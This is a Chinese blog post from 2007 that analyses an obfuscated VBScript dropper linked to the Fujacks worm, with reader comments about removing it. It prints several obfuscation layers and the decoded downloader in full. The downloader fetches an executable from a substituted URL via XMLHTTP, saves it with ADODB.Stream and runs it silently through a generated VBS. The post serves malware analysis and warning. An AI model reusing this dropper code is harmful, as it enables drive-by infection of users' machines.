上一篇
下一篇
实在佩服做病毒的“同志!”
作者:fmben 日期:2007-01-02
不得不对做病毒的朋友说声——辛苦了!
有位客户的服务器中毒了,查杀了一次后过了几天,又出现了。我尝试着分析这个病毒,结果发现这个人太厉害了,花尽各种心思去处理,加密他的病毒,我把他代码至少反处理了5次以上才看出来执行体。
首先他是一堆乱七八糟的数字:
然后我分解出来后,又是另外一堆乱七八糟的东西:
然后再来乱七八糟一次:
最后出来元凶(为了防止大家中毒,我把病毒地址替换为fmben.com了):
还是晕,我再整:
总结,他把所有的东西都拆的不成样子,然后组合运行,以跳过杀毒软件等追杀,别说他写,我反处理都好累。
注:
脚本为vbs,病毒为最近爆发流行的Fujacks
元凶:Adobe.Stream!!!!!
有位客户的服务器中毒了,查杀了一次后过了几天,又出现了。我尝试着分析这个病毒,结果发现这个人太厉害了,花尽各种心思去处理,加密他的病毒,我把他代码至少反处理了5次以上才看出来执行体。
首先他是一堆乱七八糟的数字:
复制内容到剪贴板
程序代码
程序代码Cn911="83,61,34,52,70,54,69,50,48,52,...省略了好几百个数字"
Function Rechange(Q)
S=Split(Q,",")
Cn922=""
For i = 0 To UBound(S)
Cn922=Cn922&Chr(eval(S(i)))
Next
Rechange=Cn922
End Function
EXECUTE(Rechange(Cn911))
Function Rechange(Q)
S=Split(Q,",")
Cn922=""
For i = 0 To UBound(S)
Cn922=Cn922&Chr(eval(S(i)))
Next
Rechange=Cn922
End Function
EXECUTE(Rechange(Cn911))
然后我分解出来后,又是另外一堆乱七八糟的东西:
复制内容到剪贴板 程序代码
程序代码S="4F6E204572726F7220...省略了上千个字符和数字":D="EXECUTE """"":C="&CHR(&H":N=")":DO WHILE LEN(S)>1:IF ISNUMERIC(LEFT(S,1)) THEN D=D&C&LEFT(S,2)&N:S=MID(S,3) ELSE D=D&C&LEFT(S,4)&N:S=MID(S,5) LOOP:EXECUTE D
然后再来乱七八糟一次:
复制内容到剪贴板 程序代码
程序代码EXECUTE &CHR(&H4F)&CHR(&H6E)&CHR(&H20)&...省略好几千个cha函数
最后出来元凶(为了防止大家中毒,我把病毒地址替换为fmben.com了):
复制内容到剪贴板 程序代码
程序代码On Error Resume Next CnLRU="http://www.fmben.com/worm.exe" Set Ob = document.createElement("ob"&"je"&"c"&"t") Ob.SetAttribute "cla"&"ssid", "c"&"ls"&"i"&"d:BD9"&"6C55"&"6-65"&"A3-11D0"&"-983A-00C"&"04FC29"&"E36" sHTTP="M"&"ic"&"ro"&"s"&"of"&"t"&".X"&"M"&"L"&"H"&"TT"&"P" Set Pop = Ob.CreateObject(sHTTP,"") Pop.Open "G"&"ET", CnLRU, False Pop.Send ExeName="Cn"&"91"&"1.exe" VbsName="Cn"&"91"&"1.vbs" Set FPI = Ob.createobject("Scri"&"p"&"ting.F"&"i"&"le"&"Sy"&"st"&"e"&"mO"&"bje"&"ct","") Set sTmp = FPI.GetSpecialFolder(2) ExeName=FPI.BuildPath(sTmp,ExeName) VbsName=FPI.BuildPath(sTmp,VbsName) AA="A"&"d" AB="o"&"d"&"b"&"."&"s"&"tre"&"am" AdM=AA&AB Set Bda = Ob.createobject(AdM,"") Bda.type=1 Bda.Open Bda.Write Pop.ResponseBody Bda.Savetofile ExeName,2 Bda.Close Bda.Type=2 Bda.Open Bda.WriteText "Set Shell = CreateObject(""Wscript.Shell"")"&vbCrLf&"Shell.Run ("""&ExeName&""")"&vbCrLf&"Set Shell = Nothing" Bda.Savetofile VbsName,2 Bda.Close sRun="S"&"h"&"e"&"l"&"l"&"."&"A"&"p"&"p"&"l"&"i" Set Run = Ob.createobject(sRun&"cation","") Run.ShellExecute VbsName,"","","Open",0
还是晕,我再整:
复制内容到剪贴板 程序代码
程序代码On Error Resume Next
CnLRU="http://www.fmben.com/worm.exe"
Set Ob = document.createElement("object")
Ob.SetAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
sHTTP="Microsoft.XMLHTTP"
Set Pop = Ob.CreateObject(sHTTP,"")
Pop.Open "GET", CnLRU, False
Pop.Send ExeName="Cn911.exe"
VbsName="Cn911.vbs"
Set FPI = Ob.createobject("Scripting.FileSystemObject","")
Set sTmp = FPI.GetSpecialFolder(2)
ExeName=FPI.BuildPath(sTmp,ExeName)
VbsName=FPI.BuildPath(sTmp,VbsName)
AA="Ad"
AB="odb.stream"
AdM=AA&AB
Set Bda = Ob.createobject(AdM,"")
Bda.type=1
Bda.Open
Bda.Write
Pop.ResponseBody
Bda.Savetofile ExeName,2
Bda.Close
Bda.Type=2
Bda.Open
Bda.WriteText "Set Shell = CreateObject("Wscript.Shell")
Shell.Run ("&ExeName&")
Set Shell = Nothing"
Bda.Savetofile VbsName,2
Bda.Close
sRun="Shell.Appli"
Set Run = Ob.createobject(sRun&"cation","")
Run.ShellExecute VbsName,"","","Open",0
CnLRU="http://www.fmben.com/worm.exe"
Set Ob = document.createElement("object")
Ob.SetAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
sHTTP="Microsoft.XMLHTTP"
Set Pop = Ob.CreateObject(sHTTP,"")
Pop.Open "GET", CnLRU, False
Pop.Send ExeName="Cn911.exe"
VbsName="Cn911.vbs"
Set FPI = Ob.createobject("Scripting.FileSystemObject","")
Set sTmp = FPI.GetSpecialFolder(2)
ExeName=FPI.BuildPath(sTmp,ExeName)
VbsName=FPI.BuildPath(sTmp,VbsName)
AA="Ad"
AB="odb.stream"
AdM=AA&AB
Set Bda = Ob.createobject(AdM,"")
Bda.type=1
Bda.Open
Bda.Write
Pop.ResponseBody
Bda.Savetofile ExeName,2
Bda.Close
Bda.Type=2
Bda.Open
Bda.WriteText "Set Shell = CreateObject("Wscript.Shell")
Shell.Run ("&ExeName&")
Set Shell = Nothing"
Bda.Savetofile VbsName,2
Bda.Close
sRun="Shell.Appli"
Set Run = Ob.createobject(sRun&"cation","")
Run.ShellExecute VbsName,"","","Open",0
总结,他把所有的东西都拆的不成样子,然后组合运行,以跳过杀毒软件等追杀,别说他写,我反处理都好累。
注:
脚本为vbs,病毒为最近爆发流行的Fujacks
元凶:Adobe.Stream!!!!!
文章来自: 
引用通告: 
Tags: 
相关日志:
评论: 9 | 引用: 0 | 查看次数: 5227
回复
[quote=Iekuso]使用Symantec 防毒軟体,有偵測到kl[1].exe 和Cn911.ex
,但每過一段時間就會偵測到,系統會自動開啟兩個網頁,
一個是http://www.crazyenglish.cn/index.htm,
另一個是http://www.5dso.com/
請教該如何移除呢?[/quote]
這個應該是你機器就中毒了,建議到殺毒軟體網站下專殺。另外,你可以在組策略裏把kl.exe和Cn911.exe加到禁止運行的程式列表裏。
,但每過一段時間就會偵測到,系統會自動開啟兩個網頁,
一個是http://www.crazyenglish.cn/index.htm,
另一個是http://www.5dso.com/
請教該如何移除呢?[/quote]
這個應該是你機器就中毒了,建議到殺毒軟體網站下專殺。另外,你可以在組策略裏把kl.exe和Cn911.exe加到禁止運行的程式列表裏。
那个病毒地址是啥啊?
使用Symantec 防毒軟体,有偵測到kl[1].exe 和Cn911.ex
,但每過一段時間就會偵測到,系統會自動開啟兩個網頁,
一個是http://www.crazyenglish.cn/index.htm,
另一個是http://www.5dso.com/
請教該如何移除呢?
,但每過一段時間就會偵測到,系統會自動開啟兩個網頁,
一個是http://www.crazyenglish.cn/index.htm,
另一個是http://www.5dso.com/
請教該如何移除呢?
一般人到http://tool.duba.net/zhuansha/253.shtml下载个专杀工具就可以了。
顶你吖,打咗咁多字居然回复唔到!
[quote=求助]高手告诉俺怎么杀啊?
谢谢啊![/quote]
用Symantec等杀毒软件好像可以处理。这个病毒变种太多,每个不一样,你得告诉我你中毒的现象。
谢谢啊![/quote]
用Symantec等杀毒软件好像可以处理。这个病毒变种太多,每个不一样,你得告诉我你中毒的现象。
高手告诉俺怎么杀啊?
谢谢啊!
谢谢啊!
最可恶的是这个病毒嵌入在一个“无法显示网页”里,让你蒙骗还不知道。 
可怜的HTTPXML就这样被人利用了。
可怜的HTTPXML就这样被人利用了。
发表评论
请留下email地址和为什么你要知道地址?因为我不希望这个病毒再有人继续传播下去。